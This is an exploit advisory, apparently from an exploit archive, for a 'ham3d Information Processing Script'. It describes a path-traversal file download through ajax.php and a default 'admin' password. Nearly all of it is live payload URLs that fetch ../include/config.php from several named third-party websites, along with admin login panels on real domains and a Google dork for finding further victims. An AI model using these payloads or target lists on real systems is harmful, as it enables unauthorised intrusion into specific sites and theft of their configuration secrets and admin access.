Share
/***********************************************************************************  
** Exploit Title: ham3d Information Processing Script Local File  
Download & Default Password Vulnerability  
**  
** Exploit Author: Milad Hacking  
**  
** Vendor Homepage : http://www.ham3d.net/  
**  
** Demo Script Link: http://wensoni.com  
**  
** Version : 1.1  
**  
** Google Dork : inurl:fa/forgotpass.html  
**  
** Date: 2019-10-25  
**  
** Tested on: Kali Linux / lceweasel  
**  
***********************************************************************************  
** Demo :  
  
http://123cookie.ir/ajax.php?download=../include/config.php  
  
http://1q1.ir/ajax.php?download=../include/config.php  
  
http://emitice.ir/ajax.php?download=../include/config.php  
  
http://wensoni.com/ajax.php?download=../include/config.php  
  
http://tiamnetworks.ir/ajax.php?download=../include/config.php  
  
http://assc.ir/ajax.php?download=../include/config.php  
  
User * Password With Login : admin  
  
http://www.5040.ir/report/admin/  
  
http://www.shoaco.com/admin951shoaco/index.php?login  
  
http://quran.kish.ir/admin159357kishetrat2486/?login  
  
http://setareganzamin.com/ADMIN123654789SETAREGANEZAMIN/index.php?login  
  
http://assc.ir/admin/?forgot_password#?login  
  
***********************************************************************************  
** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila  
Blackhat - Mahsa Black - Azinista  
Mahdi Cocain - Vahid Elmi  
Long Love Ashiyane <3  
***********************************************************************************  
https://tlgm.me/Milad_Hacking  
http://instagram.com/Milad.Hacking  
milad.hacking.blackhat@Gmail.com  
  
***********************************************************************************